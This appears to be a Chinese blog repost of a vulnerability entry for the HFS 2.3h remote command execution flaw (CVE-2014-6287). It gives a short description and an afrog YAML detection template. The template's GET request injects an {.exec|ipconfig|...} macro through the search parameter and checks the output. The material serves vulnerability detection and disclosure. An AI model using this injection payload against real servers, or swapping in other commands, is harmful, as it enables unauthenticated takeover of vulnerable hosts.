HFS 23h 命令执行漏洞

漏洞信息

漏洞名称： HFS 2.3h 命令执行漏洞

漏洞编号：

CVE： CVE-2014-6287

漏洞类型： 命令执行

漏洞等级： 严重

漏洞描述： HttpFileServer (HFS) 是一款轻量级的HTTP文件服务器软件，广泛用于Windows平台上快速共享文件。它支持通过网页界面进行文件的上传和下载，操作简便，因此在个人和小型企业中较为流行。然而，HFS 2.3h版本存在一个严重的命令执行漏洞，攻击者可以通过构造特定的search参数，远程执行任意系统命令。这一漏洞的技术根源在于HFS对用户输入的search参数未进行充分的过滤和验证，导致攻击者能够注入并执行恶意命令。由于HFS通常以较高权限运行，成功利用此漏洞的攻击者可以完全控制受影响的系统，执行任意命令，可能导致数据泄露、服务中断或其他恶意活动。此漏洞的利用无需认证，且可以远程自动化执行，因此危害性极高。

产品名称： HttpFileServer (HFS)

影响版本： 2.3h

来源： https://github.com/zan8in/afrog/blob/1823fa1eef54086d619bb8b99776a26190f6a3c1/pocs%2Fafrog-pocs%2Ffingerprinting%2Fhfs-rce-cmd-exec.yaml

类型： zan8in/afrog:github commit

POC详情


id: hfs-rce-cmd-exec

info:
  name: HFS 2.3h 命令执行漏洞检测
  author: chatgpt
  severity: critical
  description: |
    检测 HttpFileServer (HFS) v2.3h 存在命令执行漏洞，允许远程攻击者通过构造特定 search 参数执行系统命令。
  reference:
    - https://www.exploit-db.com/exploits/34668
    - https://nvd.nist.gov/vuln/detail/CVE-2014-6287
  tags: rce,hfs,cve,cve2014,windows

rules:
  r0:
    request:
      method: GET
      path: "/?search=%25xxx%25url%25:%password%}{.exec|ipconfig|timeout=5|out=abc.}RESULT:{.^abc.}"
    expression: response.status == 200 && response.body.bcontains(b"Windows IP")
expression: r0()

Github Poc

#命令执行 #zan8in/afrog:github commit

HFS 23h 命令执行漏洞

http://example.com/2025/07/05/github_1454545131/

作者

lianccc

发布于

2025年7月5日

许可协议

the_yellow_fall Twitter Update ! 上一篇

西软云XMS-futurehotel-operate XXE漏洞下一篇